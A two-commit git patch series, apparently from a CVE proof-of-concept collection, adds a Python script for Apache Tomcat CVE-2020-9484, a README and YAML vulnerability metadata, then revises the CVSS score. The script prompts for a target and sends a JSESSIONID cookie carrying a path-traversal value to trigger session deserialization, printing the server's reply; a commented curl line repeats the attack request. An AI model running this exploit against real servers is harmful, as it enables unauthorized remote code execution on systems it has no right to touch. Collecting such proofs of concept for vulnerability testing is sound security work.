From f39d2755f0567bab8da95678b7685a989e244e52 Mon Sep 17 00:00:00 2001
From: buaa-yy <sy2139215@buaa.edu.cn>
Date: Fri, 10 Mar 2023 19:45:44 +0800
Subject: [PATCH 1/2] add CVE-2020-9484

---
 .../2020/CVE-2020-9484/CVE-2020-9484.py       | 37 +++++++++++++++++++
 .../2020/CVE-2020-9484/README.md              | 13 +++++++
 .../2020/yaml/CVE-2020-9484.yaml              | 19 ++++++++++
 openkylin_list.yaml                           |  2 +
 4 files changed, 71 insertions(+)
 create mode 100755 cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
 create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/README.md
 create mode 100644 cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml

diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
new file mode 100755
index 00000000..084b803f
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
@@ -0,0 +1,37 @@
+import requests
+import os, sys
+
+
+
+def main():
+    print("CVE: CVE-2020-9484")
+    RHOST = input("Target : ")
+    try:
+        u = requests.get(f"{RHOST}/index.jsp")
+        if u.status_code == 200:
+            print("Found Index Page")
+            pass
+        elif u.status_code == 404:
+            print("Looks Like we Could not Find index Page")
+            sys.exit()
+        header = {
+            "Cookie": "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+        }
+        sett = requests.get(f"{RHOST}/index.jsp", headers=header)
+        if sett.status_code == 200:
+            print(sett.text)
+            #os.system(f"curl '{RHOST}/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -oh 'java' | sort -u == 'java' | tee result.txt | -o /dev/null")
+            #print("If Any Results They Will be Saved in result.txt")
+            print("Output ^")
+        if sett.status_code == 500:
+            print("Patched")
+            sys.exit()
+            
+        if sett.text == " ":
+            print("No Content")
+            pass
+        
+    except Exception as e:
+        print("Looks Like there Was A Problem Connecting to Target")
+        
+main()
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/README.md b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
new file mode 100644
index 00000000..1f18c3ce
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
@@ -0,0 +1,13 @@
+# Tomcat-RCE
+Apache Tomcat RCE
+#Use
+Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。攻击者可能可以构造恶意请求，造成反序列化代码执行漏洞。
+[-]   Apache Tomcat RCE漏洞 (CVE-2020-9484)
+
+
+# eg
+
+python3 CVE-2020-9484.py
+
+# reference
+code from: https://github.com/RepublicR0K/CVE-2020-9484
diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
new file mode 100644
index 00000000..9b2a0885
--- /dev/null
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-9484
+source: https://github.com/RepublicR0K/CVE-2020-9484
+info:
+  name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时，使用不安全的配置（没有使用EncryptInterceptor）会存在反序列化漏洞，攻击者通过精心构造的数据包， 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+  severity: high
+  description:
+    当Tomcat使用了自带session同步功能时，使用不安全的配置（没有使用EncryptInterceptor）会存在反序列化漏洞，攻击者通过精心构造的数据包， 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+  scope-of-influence:
+    Apache Tomcat < 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54, 7.0.0 to 7.0.103
+  reference:
+    - https://seclists.org/oss-sec/2020/q2/136
+    - https://www.seebug.org/vuldb/ssvid-98234
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2020-9484
+    cnvd-id: None
+    kve-id: None
+  tags: cve2020,Apache,Tomcat,RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2..ff187cba 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -8,6 +8,8 @@ cve:
     - CVE-2022-24112
   apache-solr:
     - CVE-2021-27905
+  apache-tomcat:
+    - CVE-2020-9484
   linux-kernel:
     - CVE-2021-4204
     - CVE-2021-22555
-- 
Gitee


From 4b8d79784ddb912086ee46fbc4b604eb9f5a5f2b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= <sy2139215@buaa.edu.cn>
Date: Mon, 13 Mar 2023 06:53:36 +0000
Subject: [PATCH 2/2] update cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 于越 <sy2139215@buaa.edu.cn>
---
 cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
index 9b2a0885..e4cf2843 100644
--- a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -11,9 +11,10 @@ info:
     - https://seclists.org/oss-sec/2020/q2/136
     - https://www.seebug.org/vuldb/ssvid-98234
   classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
+    cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.0
     cve-id: CVE-2020-9484
+    cwe-id: CWE-502
     cnvd-id: None
     kve-id: None
-  tags: cve2020,Apache,Tomcat,RCE
+  tags: cve2020, Apache, Tomcat, RCE
-- 
Gitee